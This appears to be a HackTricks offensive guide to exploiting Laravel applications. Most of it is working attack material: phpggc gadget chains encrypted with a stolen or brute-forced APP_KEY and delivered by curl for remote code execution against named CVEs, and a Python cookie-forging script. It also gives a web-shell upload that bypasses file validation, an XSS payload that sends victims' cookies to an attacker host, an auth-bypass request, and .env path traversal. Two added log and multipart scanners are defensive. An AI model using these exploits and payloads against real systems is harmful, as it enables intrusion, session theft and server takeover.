# Laravel

> [!TIP]
> Learn and practise AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn and practise GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
> Learn and practise Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
>
> Support HackTricks

## Laravel SQLInjection

Read information about this here: https://stitcher.io/blog/unsafe-sql-functions-in-laravel


## APP_KEY & Encryption internals (Laravel >=5.6)

Laravel uses AES-256-CBC (or GCM) with HMAC integrity via Illuminate\Encryption\Encrypter. The raw ciphertext that is finally sent to the client is the Base64 of a JSON object such as:

```json
{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}
```

encrypt($value, $serialize=true) will serialize() the plaintext by default, while decrypt($payload, $unserialize=true) automatically unserialize()s the decrypted value. Therefore any attacker who knows the 32-byte APP_KEY secret can craft an encrypted PHP serialized object and obtain RCE through magic methods (__wakeup, __destruct, …).

Minimal PoC (framework ≥9.x):

```php
use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
```

Inject the crafted string into any vulnerable decrypt() sink (route param, cookie, session, …).


### laravel-crypto-killer 🧨

laravel-crypto-killer automates the whole process and adds a convenient bruteforce mode:

```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```

The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.


## Real-world vulnerable examples

| Project | Vulnerable sink | Gadget chain |
|---|---|---|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie when `Passport::withCookieSerialization()` is enabled | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` cookie | Laravel/RCE15 |

The exploitation flow is always the same:

1. Obtain or brute-force the 32-byte APP_KEY.
2. Build a gadget chain with PHPGGC (for example Laravel/RCE13, Laravel/RCE9 or Laravel/RCE15).
3. Encrypt the serialized gadget with laravel_crypto_killer.py and the recovered APP_KEY.
4. Deliver the ciphertext to the vulnerable decrypt() sink (route parameter, cookie, session …) to trigger RCE.

Below are short one-liners that prove the complete attack path for each real CVE mentioned above:

```bash
# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```

Because every fresh Laravel response sets at least one encrypted cookie (XSRF-TOKEN and usually laravel_session), public internet scanners (Shodan, Censys, …) leak millions of ciphertexts that can be attacked offline.

Key findings of the research published by Synacktiv (2024-2025):

- Dataset July 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
- Dataset May 2025 » 625 k tokens, 3.56 % keys cracked
- 1 000 servers are still vulnerable to the legacy CVE-2018-15133 because their tokens directly contain serialized data.
- Heavy reuse of the same APP_KEY: the top-10 APP_KEYs are hard-coded defaults shipped with commercial Laravel templates (UltimatePOS, Invoice Ninja, XPanel, …).

The private Go tool nounours raises AES-CBC/GCM bruteforce throughput to ~1.5 billion tries/s, cutting full-dataset cracking to under 2 minutes.

## CVE-2024-52301 – HTTP argv/env override → auth bypass

When PHP's register_argc_argv=On (the default on many distros), PHP exposes an argv array for HTTP requests derived from the query string. Recent Laravel versions parsed these "CLI-like" args and honoured --env=<value> at runtime. This allows switching the framework environment for the current HTTP request simply by appending it to any URL:

- Quick check:
  - Visit https://target/?--env=local (or any string) and look for environment-dependent changes (debug banners, footers, verbose errors). If the string is reflected, the override works.
- Impact example (business logic trusting a specific env):
  - If the app has branches such as `if (app()->environment('preprod')) { /* bypass auth */ }`, you can log in without valid credentials by sending the login POST to:
  - `POST /login?--env=preprod`
- Notes:
  - Works per request; no persistence.
  - Requires register_argc_argv=On and a vulnerable Laravel version that reads argv on HTTP requests.
  - Useful primitive for obtaining verbose errors in "debug" environments or triggering environment-gated code paths.
- Mitigations:
  - Disable register_argc_argv for PHP-FPM/Apache.
  - Update Laravel so it does not parse argv on HTTP requests, and remove any assumption that trusts app()->environment() on production routes.

Minimal exploitation flow (Burp):

```http
POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf
```
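As an added, defender-side example that is not part of the original page: a small Python scanner that mirrors how PHP builds `$_SERVER['argv']` under register_argc_argv (raw QUERY_STRING split on `+`, no URL-decoding) and how Laravel's environment detector reads `--env`, and runs that over access-log lines to find requests that would have switched the environment. The log lines are constructed samples and the helper names (`php_argv`, `env_override`, `scan_log`) are hypothetical.

```python
import re
from typing import List, Optional, Tuple

# Constructed access-log lines in "combined" format (sample data, not from the original page).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2025:12:00:01 +0000] "GET /profiles HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Mar/2025:12:00:02 +0000] "GET /?--env=local HTTP/1.1" 200 812 "-" "curl/8.4"
203.0.113.12 - - [10/Mar/2025:12:00:03 +0000] "POST /login?--env=preprod HTTP/1.1" 302 0 "-" "curl/8.4"
203.0.113.13 - - [10/Mar/2025:12:00:04 +0000] "GET /search?q=--env HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.14 - - [10/Mar/2025:12:00:05 +0000] "GET /?%2D%2Denv=debug HTTP/1.1" 200 900 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def php_argv(query: str) -> List[str]:
    """Mirror php_build_argv(): with register_argc_argv=On the raw QUERY_STRING is split on
    '+' and exposed as $_SERVER['argv']; nothing is URL-decoded, so %2D%2Denv never becomes --env."""
    return query.split('+') if query else []


def env_override(target: str) -> Optional[str]:
    """Return the environment Laravel's EnvironmentDetector would take from the argv derived
    from this request target ('--env=value' or '--env value'), or None if nothing overrides it."""
    args = php_argv(target.partition('?')[2])
    for i, value in enumerate(args):
        if value == '--env':                      # "--env value" form: the next argv entry
            return args[i + 1] if i + 1 < len(args) else None
        if value.startswith('--env') and '=' in value:   # "--env=value" form
            return value.split('=', 1)[1]
    return None


def scan_log(text: str) -> List[Tuple[str, str, str, str]]:
    """Collect (ip, method, target, env) for every request that would switch the environment."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        env = env_override(m['target'])
        if env is not None:
            hits.append((m['ip'], m['method'], m['target'], env))
    return hits


if __name__ == '__main__':
    for ip, method, target, env in scan_log(SAMPLE_LOG):
        print(f'env override from {ip}: {method} {target} -> {env!r}')
```

Lines where `--env` only appears inside a value (`q=--env`) or URL-encoded are not flagged because PHP never turns them into a `--env` argv entry; alert on them separately if you want to catch probing.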

## CVE-2025-27515 – Wildcard file validation bypass (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 let crafted multipart requests completely bypass any rule bound to files.* / images.*. The parser that expands wildcard keys could be confused by attacker-driven placeholders (for example, pre-filling the __asterisk__ segments), so the framework would build UploadedFile objects without ever running image, mimes, dimensions, max, etc. Once the malicious blob reaches Storage::putFile* you can pivot to any of the file-upload primitives already listed in HackTricks (web shells, log poisoning, signed job deserialization, …).

### Hunting the pattern

- Static: `rg -n "files\\.\*" -g"*.php" app/` or review FormRequest classes for rules() that return arrays containing files.*.
- Dynamic: hook Illuminate\Validation\Validator::validate() with Xdebug or Laravel Telescope in pre-production to record every request that hits the weak rule.
- Middleware/route review: endpoints that collect multiple files (avatar importers, document portals, drag-n-drop components) usually trust files.*.

### Practical exploitation flow

1. Capture a legitimate upload and replay it in Burp Repeater.
2. Duplicate the same part but rename the field so it carries placeholder tokens (for example files[0][__asterisk__payload]) or add another nested array (files[0][alt][0]). On vulnerable builds the second part is never validated but still becomes an UploadedFile entry.
3. Point the crafted file at a PHP payload (shell.php, .phar, polyglot) and let the application store it on a web-reachable disk (usually public/ once php artisan storage:link is active).

```bash
curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'
```

Keep fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) until you find one that bypasses the validator but is still written to disk; patched builds reject these crafted attribute names immediately.
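As an added, defender-side example that is not part of the original page or of the framework: a Python screen for multipart field names that a `files.*` rule is meant to cover, rejecting the placeholder tokens and extra nesting described above before the request reaches the validator (the kind of check a middleware or WAF rule could apply on patched and unpatched builds alike). The multipart body, boundary and file names are constructed samples; `part`, `screen_field` and `screen_multipart` are hypothetical helper names.

```python
import re
from typing import List, Optional, Tuple

BOUNDARY = '----ConstructedBoundary42'

# Tokens the wildcard expander treats as placeholders, and the only key shape files.* should see
PLACEHOLDER_TOKENS = ('__asterisk__', '__dot__')
CLEAN_FILE_KEY = re.compile(r'^files\[\d*\]$')          # files[], files[0], files[12] ...
NAME_RE = re.compile(r'Content-Disposition:\s*form-data;[^\r\n]*?\bname="([^"]*)"', re.I)


def part(name: str, body: str, filename: Optional[str] = None, ctype: str = 'text/plain') -> str:
    """Build one multipart/form-data part (used only to construct the sample request)."""
    disp = f'Content-Disposition: form-data; name="{name}"'
    if filename:
        disp += f'; filename="{filename}"'
    return f'--{BOUNDARY}\r\n{disp}\r\nContent-Type: {ctype}\r\n\r\n{body}\r\n'


# Constructed request body mirroring the key names discussed above (not a real capture)
SAMPLE_BODY = (
    part('files[0]', 'PNG...', 'ok.png', 'image/png')
    + part('files[0][__asterisk__payload]', 'not-an-image', 'shell.php')
    + part('files[0][alt][0]', 'PNG...', 'alt.png', 'image/png')
    + part('files.__dot__0', 'PNG...', 'dot.png', 'image/png')
    + part('description', 'lorem')
    + f'--{BOUNDARY}--\r\n'
)


def screen_field(name: str) -> Tuple[str, str]:
    """Decide whether a field name is safe to hand to a files.* rule; returns (verdict, reason)."""
    if any(tok in name for tok in PLACEHOLDER_TOKENS):
        return 'reject', 'placeholder token in key'
    if name == 'files' or name.startswith('files[') or name.startswith('files.'):
        if CLEAN_FILE_KEY.match(name):
            return 'allow', 'matches files[<n>]'
        return 'reject', 'not a plain files[<n>] key'
    return 'allow', 'not covered by files.*'


def screen_multipart(body: str) -> List[Tuple[str, str, str]]:
    """Screen every part of a raw multipart body; returns (field name, verdict, reason) per part."""
    return [(name,) + screen_field(name) for name in NAME_RE.findall(body)]


def rejected_fields(body: str) -> List[str]:
    """Field names that should make the whole request fail before validation runs."""
    return [name for name, verdict, _ in screen_multipart(body) if verdict == 'reject']


if __name__ == '__main__':
    for name, verdict, reason in screen_multipart(SAMPLE_BODY):
        print(f'{verdict:6} {name!r}: {reason}')
```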


## Vulnerable ecosystem packages worth chaining (2025)

### CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

If the project uses Auth0 login with the default CookieStore backend and auth0/auth0-php < 8.14.0, the GCM tag on the auth0 session cookie is short enough to be brute-forced offline. Capture the cookie, modify the JSON payload (for example set "sub":"auth0|admin" and app_metadata.roles), brute-force the tag, then replay it to obtain a valid Laravel guard session. Quick hints: composer.lock shows auth0/auth0-php <8.14.0 and .env contains AUTH0_SESSION_STORAGE=cookie.

### CVE-2025-48490 – lomkit/laravel-rest-api validation override

The lomkit/laravel-rest-api package before 2.13.0 merges per-action rules incorrectly: later definitions overwrite earlier ones for the same attribute, letting crafted fields escape validation (for example, overwriting filter rules during an update action) and leading to mass assignment or unvalidated SQL-ish filters. Practical checks:

- composer.lock lists lomkit/laravel-rest-api <2.13.0.
- /_rest/users?filters[0][column]=password&filters[0][operator]== is accepted instead of rejected, showing that filter validation was bypassed.

## Laravel tricks

### Debugging mode

If Laravel is in debugging mode you will be able to access the code and sensitive data.
For example http://127.0.0.1:8000/profiles:

This is usually required for exploiting other Laravel RCE CVEs.

### CVE-2024-13918 / CVE-2024-13919 – reflected XSS in Whoops debug pages

- Affected: Laravel 11.9.0–11.35.1 with APP_DEBUG=true (either on its own or forced through unintended env overrides such as CVE-2024-52301).
- Primitive: every uncaught exception rendered by Whoops echoes parts of the request/route without HTML encoding, so injecting <img src> / <script> into a route or request parameter yields stored-on-response XSS before authentication.
- Impact: steal XSRF-TOKEN, leak stack traces with secrets, open a browser-based pivot to reach _ignition/execute-solution inside victims' sessions, or chain with password-less dashboards that trust cookies.

Minimal PoC:

```php
// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
    abort(500);
});
```

```bash
curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"
```

Even when debug mode is normally off, forcing an error through background jobs or queue workers and probing the _ignition/health-check endpoint often uncovers staging hosts that still expose this chain.

### Fingerprinting & exposed dev endpoints

Quick checks to identify a Laravel stack and dangerous dev tooling exposed in production:

- /_ignition/health-check → Ignition present (debug tool used by CVE-2021-3129). If reachable without authentication, the app may be in debug mode or misconfigured.
- /_debugbar → Laravel Debugbar assets; often indicates debug mode.
- /telescope → Laravel Telescope (dev monitor). If public, expect heavy information disclosure and possibly actions.
- /horizon → Queue dashboard; version disclosure and sometimes CSRF-protected actions.
- X-Powered-By, the XSRF-TOKEN and laravel_session cookies, and Blade error pages also help fingerprinting.

```bash
# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done
```

### .env

Laravel stores the APP_KEY used to encrypt cookies and other credentials inside a file called .env, which can be reached with path traversal under: /../.env

Laravel will also display this information on the debug page (shown when Laravel hits an error and debug mode is enabled).

With Laravel's secret APP_KEY you can decrypt and re-encrypt cookies:

<details>

<summary>Decrypt/encrypt cookies helper (Python)</summary>

```python
import os
import json
import hashlib
import hmac
import base64
from Crypto.Cipher import AES               # pycryptodome
from Crypto.Util.Padding import pad, unpad
# from phpserialize import loads, dumps     # only needed to (un)serialize the PHP payload itself

# Based on https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3

# APP_KEY from .env without the "base64:" prefix (sample key from the gist above)
app_key = 'HyfSfw6tOF92gKtVaLaLO4053ArgEf7Ze0ndz0v487k='
key = base64.b64decode(app_key)


def mcrypt_decrypt(value, iv):
    """Raw AES-256-CBC decryption of `value` (bytes) with `iv` (16 raw bytes)."""
    return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(value)


def mcrypt_encrypt(value, iv):
    """Raw AES-256-CBC encryption; `value` must already be padded to a 16-byte multiple."""
    return AES.new(key, AES.MODE_CBC, iv=iv).encrypt(value)


def decrypt(bstring):
    """Verify the MAC of a Laravel cookie/token and return the unpadded plaintext.
    Returns b'' when the MAC does not match (wrong APP_KEY or tampered payload)."""
    dic = json.loads(base64.b64decode(bstring).decode())
    mac = dic['mac']
    value = bytes(dic['value'], 'utf-8')
    iv = bytes(dic['iv'], 'utf-8')
    # Laravel MACs the *base64* strings of iv and value, not the raw bytes
    expected = hmac.new(key, iv + value, hashlib.sha256).hexdigest()
    if hmac.compare_digest(mac, expected):
        plaintext = mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
        return unpad(plaintext, 16)
        # return loads(unpad(plaintext, 16))  # to get the PHP-unserialized value instead
    return b''


def encrypt(string):
    """Encrypt raw bytes into a Laravel-compatible base64({"iv","value","mac"}) token."""
    iv = os.urandom(16)
    # string = dumps(string)  # serialize first if the app expects a PHP-serialized value
    value = base64.b64encode(mcrypt_encrypt(pad(string, 16), iv))
    iv = base64.b64encode(iv)
    mac = hmac.new(key, iv + value, hashlib.sha256).hexdigest()
    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))


# A decrypted laravel_session cookie looks like this (PKCS#7 padding already stripped):
# b'{"data":"a:6:{s:6:\"_token\";s:40:\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\";s:8:\"username\";s:8:\"guestc32\";s:5:\"order\";s:2:\"id\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\/\/206.189.25.23:31031\/api\/configs\";}}","expires":1605140631}'

if __name__ == '__main__':
    # decrypt('<captured laravel_session cookie value>')
    forged = encrypt(rb'{"data":"a:6:{s:6:\"_token\";s:40:\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\";s:8:\"username\";s:8:\"guest60e\";s:5:\"order\";s:8:\"lolololo\";s:9:\"direction\";s:4:\"desc\";s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}s:9:\"_previous\";a:1:{s:3:\"url\";s:38:\"http:\/\/206.189.25.23:31031\/api\/configs\";}}","expires":1605141157}')
    print(forged.decode())
    print(decrypt(forged))
```

</details>

### Laravel Deserialization RCE

Vulnerable versions: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Information about the deserialization vulnerability can be found here: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

You can test and exploit it using [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Or you can also exploit it with metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Another deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## References
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)

